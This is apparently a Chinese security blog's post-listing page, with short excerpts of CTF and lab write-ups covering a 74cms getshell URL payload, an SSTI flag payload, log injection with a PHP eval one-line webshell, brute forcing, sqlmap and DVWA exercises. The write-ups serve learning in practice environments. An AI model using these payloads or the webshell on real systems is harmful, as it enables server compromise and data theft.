自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(14)
  • 收藏
  • 关注

原创 74cms v4.2.1-v4.2.129-后台getshell漏洞 复现

0x00 影响范围v4.2.1-v4.2.1290X01 环境搭建74CMS官网 下载 v4.2.1-v4.2.1290X02 漏洞复现Payload:http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址:http://127.0.0.1/74cms/Application/Home/Conf/config.php路径:\74cms\up

2021-06-10 17:26:19 384 4

原创 JSFinder使用方法

Github 下载后解压在python 环境下运行 解压的文件夹中 打开命令行工具简单爬取 python jsfinder.py -u 你要爬取的网址深度爬取 python jsfinder.py -u 你要爬取的网址 -d爬取出来的 url写入文件 -ou python jsfinder.py -u 你要爬取的网址 -d -ou xxx.txt爬取出来的 子域名写入文件 -ospython jsfinder.py -u 你要爬取的网址 -d -ou xxx.txt .

2021-05-16 11:31:44 825

原创 CTF刷题刷题经验累积2 Simple_SSTI_1---bugku

打开发现让传入一个名为flag的参数F12直接查看最下面说在flask里,我们经常建立一个SECRET_KEY,上方模板注入直接访问URL+?flag={{ config.SECRET_KEY}}得到flag。

2021-05-11 21:15:38 674

原创 CTF刷题积累经验1 CTFshow web4

使用php 伪协议发现不行那么我们进行 日志注入 获取shell?url=/var/log/nginx/access.log3.写入一句话木马<?php @eval($_POST['LCZ']);?>通过AntSword 连接 拿到flag

2021-05-09 15:52:01 323

原创 Kali 搭建Vulhub靶场 (详细)

这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub安装Docker检查软件更新apt-get update安装https协议、CA证书apt-get install -y apt-transport-https ca-certificates安装dockerapt install docker.iodocker -v查看是否安装成功启动dockersystemctl start docker显示docker信息docker ps -

2021-04-21 16:44:21 1492 1

原创 CTF HUB 弱口令

CTF HUB 弱口令映入眼帘是一个管理后台 则用户名很可能是admin 我们打开 Burp Suite 进行 字典攻击抓取数据包 然后 发送到intrutor 进行字典攻击发现password 长度不同 则很有可能是密码发现得到flag...

2021-04-21 15:52:59 345

转载 SQLMAP命令详解

Options–version:显示当前sqlmap的版本号-h:显示帮助信息-hh:显示详细的帮助信息-v VERBOSE:详细级别,VERBOSE为数字,默认为1Target-d DIRECT:直接连接到数据库-u URL或–url=URL:目标地址(URL)-l LOGFILE:从Burp或WebScarab代理的日志中解析目标-x SITEMAPURL:从一个XML文件中解析目标-m BULKFILE:扫描文本文件中的多个目标-r REQUESTFILE:从文件中导入HTTP请

2021-04-20 11:52:39 698

原创 CTF HUB 目标遍历

CTF HUB 目标遍历话不多说打开靶场 按照题目目标遍历 应该是寻找目录里存在的flag最后在3/1找到flag.txt解出该题

2021-04-14 10:32:15 127

原创 DVWA 靶场File Inclusion文件包含

File UploadFile Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。DVWA 靶场File Inclusion文件包含low二级目录三级目录low<?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going

2021-04-11 15:33:52 176

原创 DVWA 靶场CSRF(跨站请求伪造)

靶场CSRFlowMiddlelow<?phpif( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do!

2021-04-10 19:50:36 233

原创 DVWA靶场 Command Injection(命令行注入)

DVWA靶场 Command Injection(命令行注入)LOWMediumHighCommand Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。LOW<?phpif( isset( $_POST[ 'Submit' ] ) ) { // Get input $target

2021-04-10 16:38:33 281

原创 DVWA靶场 Brute Force 练习

DVWA靶场 Brute Force 练习LowMediumLow将等级调为Low输入任意的密码 然后使用Burp Suite 进行抓包发送到Intruder 模块点击clearadd 我们的密码 让他成为爆破点然后点击 Attack进行攻击发现 1234长度不同 1234很可能为改账户密码Medium点击 View Source 查看源代码下面展示一些 内联代码片。// A code blockvar foo = 'bar';<?phpif( isset(

2021-04-10 16:03:59 161

原创 ## 学会使用Wireshark网络监听 设置代理服务器

学会使用Wireshark网络监听 设置代理服务器设置一台计算机为代理服务器 端口808查看代理服务器IP地址访问10.1.1.2 打开Wireshark监听 HTTP数据包成功抓包到输入的账号密码

2021-03-28 17:27:25 3388

原创 学习GNS3的使用

学习GNS3的使用了解GNS3的使用方法,能够用GN3建立和模拟网络模型,并且将GNS3关联wireshark,进行抓包。选项区这些按钮,比如是用来创建、打开工程用的;用来显示连接端口;用来打开所有设备的console口;这些则是开启、挂起、关闭设备的作用;是用来画图辅助、写注释、放大缩小等辅助功能。然后是设备按钮区我们要想添加设备都需要在这里选择需要的设备,然后拖入中间的工作区域,设备由上到下依次为路由器、交换机、终端、安全设备、所有设备和连线。我们选择完设备后使用进行连

2021-03-01 11:44:29 3051 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除